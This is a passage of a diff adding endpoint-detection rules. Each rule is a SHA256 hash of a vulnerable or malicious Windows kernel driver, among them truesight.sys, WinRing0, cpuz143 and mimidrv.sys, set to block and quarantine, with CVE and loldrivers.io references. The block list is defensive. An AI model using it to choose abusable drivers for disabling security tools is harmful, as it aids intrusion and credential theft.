"references": [], + "type": "hash", + "value": "74bc7ae43c81d7d15c53d1182a7c531928849af5a8f7a0efc330b1c06a1fd124", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "98a71bc1-72a2-5132-91a8-247c20d6bfaa", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.475283Z", + "creation_date": "2026-03-23T11:45:31.475286Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.475296Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e1505e946a9a25ab41592508a479846bfaaddcd7e78216cb199dec969247de48", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "98a7d636-307f-56a3-8f0b-2207a6af3762", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": 
"af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.476820Z", + "creation_date": "2026-03-23T11:45:31.476824Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.476833Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "6a4c13dd5f92998c181129822281408859e2aad4616d3f05f935c0e9ccd19137", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "98accf8d-268d-5b0c-afd5-f4afb4f1f8cc", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.828507Z", + "creation_date": "2026-03-23T11:45:30.828509Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.828515Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "665dc47a18dbaa857591a35072a24032c26a05167823950dda3f2b5791ae027c", + "comment": 
"Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "98bcf4cc-3020-5c16-9f72-d3dada4c6ed5", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.826084Z", + "creation_date": "2026-03-23T11:45:31.826086Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.826092Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "f2d89424cae23b487c0f580f69cdb0ea2da8a58bc038f554e3fed210776bff35", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "98bd7951-ad9a-5726-8f32-85a341713d30", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + 
"origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.974333Z", + "creation_date": "2026-03-23T11:45:29.974334Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.974340Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "6ad7bdf11a7ce7296a06eb4f14091df84fafdb04413e714f09f9ea6c686a1323", + "comment": "Trend Micro Anti-Rootkit Common Module vulnerable driver (aka TmComm.sys) [CVE-2007-0856] [https://www.loldrivers.io/drivers/22aa985b-5fdb-4e38-9382-a496220c27ec/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "98c2e70b-1d51-53f5-9ed4-2f3fe7196040", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.617202Z", + "creation_date": "2026-03-23T11:45:29.617204Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.617209Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "47eaebc920ccf99e09fc9924feb6b19b8a28589f52783327067c9b09754b5e84", + "comment": "Noriyuki MIYAZAKI's WinRing0 dangerous driver (aka WinRing0x64.sys) [CVE-2020-14979] 
[https://www.loldrivers.io/drivers/f0fd5bc6-9ebd-4eb0-93ce-9256a5b9abf9/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "98c3c19b-90c1-5c90-a9de-8a522f13d080", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.817686Z", + "creation_date": "2026-03-23T11:45:31.817689Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.817697Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "901a8d1e209b63a83a16d870a5563a2d51db27f1bea484f42f234fc8ee0d6595", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "98c6e807-cc00-5ede-8bd1-771b12ac761b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:32.143594Z", + "creation_date": 
"2026-03-23T11:45:32.143596Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:32.143602Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c35cab244bd88bf0b1e7fc89c587d82763f66cf1108084713f867f72cc6f3633", + "comment": "Vulnerable Kernel Driver (aka DcProtect.sys) [https://www.loldrivers.io/drivers/7cee2ce8-7881-4a9a-bb18-61587c95f4a2/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "98c70085-c674-592c-ae8e-bca53da23384", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.985740Z", + "creation_date": "2026-03-23T11:45:29.985742Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.985748Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "23e89fd30a1c7db37f3ea81b779ce9acf8a4294397cbb54cff350d54afcfd931", + "comment": "Malicious Kernel Driver (aka malicious.sys) [https://github.com/zeze-zeze/CYBERSEC2023-BYOVD-Demo] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "98d18dc5-d517-5700-b173-f61ea7994452", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 
10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.810415Z", + "creation_date": "2026-03-23T11:45:31.810417Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.810423Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "90c0b84e071d00031d7c429b667af2df9caaf83e2ad5df14606016dc26006893", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "98daac20-5062-5e00-ab18-49c14c5188ed", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.810930Z", + "creation_date": "2026-03-23T11:45:31.810932Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.810938Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, 
+ "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "6b3a2145383699b2bec4d5c54ee6ccabeb3b1ce316db81cccc5fac2d40ee5564", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "99078a23-fb8c-5c6d-b22b-ea7812c56b61", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:32.143096Z", + "creation_date": "2026-03-23T11:45:32.143098Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:32.143103Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "a41e9bb037cf1dc2237659b1158f0ed4e49b752b2f9dae4cc310933a9d1f1e47", + "comment": "Vulnerable Kernel Driver (aka echo_driver.sys) [https://www.loldrivers.io/drivers/afb8bb46-1d13-407d-9866-1daa7c82ca63/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "99078e89-79b3-52a8-9d89-cb693ed496ef", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + 
"rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.452738Z", + "creation_date": "2026-03-23T11:45:30.452742Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.452751Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "feef191064d18b6fb63b7299415d1b1e2ec8fcdd742854aa96268d0ec4a0f7b6", + "comment": "Vulnerable Kernel Driver (aka fiddrv64.sys) [https://www.loldrivers.io/drivers/64f3d4b0-6d2b-4275-b3d4-15d092af4092/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "990e9f03-dc6a-5661-8f56-3b342d77e12f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.157101Z", + "creation_date": "2026-03-23T11:45:31.157103Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.157108Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e97da3dd77998a3b28a21f73d996613b10926dca1496f66f2aa928e44e967ea5", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka 
truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "990ea36a-da4f-5779-9c6e-d27330140e6c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.480843Z", + "creation_date": "2026-03-23T11:45:31.480846Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.480854Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e53f7184c76652cb62d46440b14c331ae2e27018497d827d125169c959dc2950", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "9917aa9c-8f2e-52dd-ab92-c987e6b2976a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.610104Z", + 
"creation_date": "2026-03-23T11:45:29.610106Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.610112Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "2a9d481ffdc5c1e2cb50cf078be32be06b21f6e2b38e90e008edfc8c4f2a9c4e", + "comment": "CPUID CPU-Z vulnerable driver (aka cpuz143_x64.sys) [CVE-2017-15302] [https://www.loldrivers.io/drivers/de003542-80e1-4aa0-9b99-ed8647a93a6e/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "991b5bca-5c20-5b7c-a3d5-61827690242a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.980413Z", + "creation_date": "2026-03-23T11:45:29.980415Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.980420Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e77786b21dbe73e9619ac9aac5e7e92989333d559aa22b4b65c97f0a42ff2e21", + "comment": "Vulnerable Kernel Driver (aka rzpnk.sys) [https://www.loldrivers.io/drivers/1c6e1d3b-f825-4065-9e0c-83386883e40f/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "99253507-6863-50b3-85a6-77bf8607ef07", + "test_maturity_current_count": 0, 
+ "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:32.146801Z", + "creation_date": "2026-03-23T11:45:32.146803Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:32.146808Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "6a2a0f9c56ee9bf7b62e1d4e1929d13046cd78a93d8c607fe4728cc5b1e8d050", + "comment": "Vulnerable Kernel Driver (aka CSAgent.sys) [https://www.loldrivers.io/drivers/9974b134-7fee-4c7a-9b0d-38b3b2d7e957/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "99281d70-da9e-580a-9d01-b8d73c63f114", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.972474Z", + "creation_date": "2026-03-23T11:45:29.972476Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.972481Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + 
"rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "58a74dceb2022cd8a358b92acd1b48a5e01c524c3b0195d7033e4bd55eff4495", + "comment": "TG Soft vulnerable driver (aka viragt.sys and viragt64.sys) [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "992e2097-5c6e-5899-a3b6-c9435436ec22", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.470520Z", + "creation_date": "2026-03-23T11:45:30.470524Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.470535Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e1b3a3a67599aae12c073ba5ca0928c2c316d438c2b5462194c97687dda64903", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "992f4778-07a1-5cdc-bd68-6de12f3fdcc5", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": 
"af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.835928Z", + "creation_date": "2026-03-23T11:45:30.835930Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.835935Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "0beeaa2d2dc2bb86bfbf82651967d3edff104c565cf94b57b853adc70e8429fb", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "9933d83a-1366-5eec-b7e4-db339e2ef8c0", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.479686Z", + "creation_date": "2026-03-23T11:45:30.479688Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.479693Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "3972159a58fd04da06f648c3828648cf394d3eb6af89538166cae8e6184c3eb6", + "comment": 
"Vulnerable Kernel Driver (aka amifldrv64.sys) [https://www.loldrivers.io/drivers/a5eb98bf-2133-46e8-848f-a299ea0ddefa/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "993772fd-1844-50bc-be33-e18d49270d62", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.821926Z", + "creation_date": "2026-03-23T11:45:30.821929Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.821938Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "7436cb59411572a6194bfffad9f9e5194107da417457d4e20a6ef1d58491e3c9", + "comment": "Vulnerable Kernel Driver (aka ComputerZ.Sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "994113c1-2bc3-50b4-884e-9000a46dc595", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.475185Z", + "creation_date": 
"2026-03-23T11:45:31.475190Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.475200Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "6267d7ad1aa3b2971299791711f0a06ac7d7813c20b61c8122953adcb55c9735", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "994e8590-5ad3-5b35-b8ea-ab50ba267657", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + 